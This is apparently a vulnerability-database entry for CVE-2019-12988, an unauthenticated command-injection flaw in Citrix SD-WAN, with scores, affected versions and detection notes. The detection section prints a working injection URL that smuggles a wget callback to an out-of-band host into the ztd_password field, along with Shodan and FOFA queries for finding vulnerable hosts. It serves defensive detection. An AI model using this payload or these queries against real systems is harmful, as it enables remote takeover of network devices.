CVE-2019-12988
published 2019-07-16

CVE-2019-12988: Citrix SD-WAN 10.2.x before 10.2.3 and NetScaler SD-WAN 10.0.x before 10.0.8 have Improper Input Validation (issue 4 of 6).

Priority: P1, 87, critical
CVSS 3.0: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Flags: ITW, EXPLOIT, VulnCheck KEV
Exploited in the wild
EPSS: 42.55% (98.5th percentile)

Affected (6 ranges)

Vendor   Product                Version range       Fixed in
citrix   citrix_sd-wan          -                   -
citrix   netscaler_adc_gateway  -                   -
citrix   netscaler_sd-wan       >= 10.0 < 10.0.8    10.0.8
citrix   sd-wan                 -                   -
citrix   sd-wan                 >= 10.2 < 10.2.3    10.2.3
citrix   xenserver              -                   -

Detection & IOCs (extracted from sources)

url: /Collector/nms/addModifyZTDProxy?ztd_server=127.0.0.1&ztd_port=3333&ztd_username=user&ztd_password=$(/bin/wget$IFShttp://{{interactsh-url}})
path: /Collector/nms/addModifyZTDProxy
command: $(/bin/wget$IFS<oast-host>)
  • Detect exploitation attempts by monitoring HTTP GET requests to /Collector/nms/addModifyZTDProxy with shell metacharacters (e.g., $(), $IFS) in the ztd_password parameter.
  • Confirm exploitation via out-of-band (OAST/interactsh) HTTP callback — a successful injection causes the target to issue an outbound HTTP request to an attacker-controlled host.
  • Fingerprint vulnerable Citrix SD-WAN hosts using Shodan query http.title:"Citrix SD-WAN" or FOFA query title="citrix sd-wan" prior to exploitation attempts.
  • Verify target is a Citrix SD-WAN instance by checking that the login page body contains the string "Citrix SD-WAN" (used as a pre-condition matcher in the PoC template).
  • The vulnerability is unauthenticated (PR:N) — no session cookie or token is required; monitor for requests to the /Collector/ path from unauthenticated sources.
  • The injection is routed through the Collector controller endpoint, not the main application login — ensure network monitoring covers internal/collector-facing ports and paths, not just the primary web UI.
  • The PoC template uses 'unsafe: true', meaning standard HTTP client safety checks are bypassed; detection rules must account for malformed or non-standard HTTP requests to this endpoint.

CVSS provenance

Source     Version  Score  Severity  Vector
nvd        v3.0     9.8    CRITICAL  CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd        v2.0     10.0   CRITICAL  AV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck  -        9.8    CRITICAL  -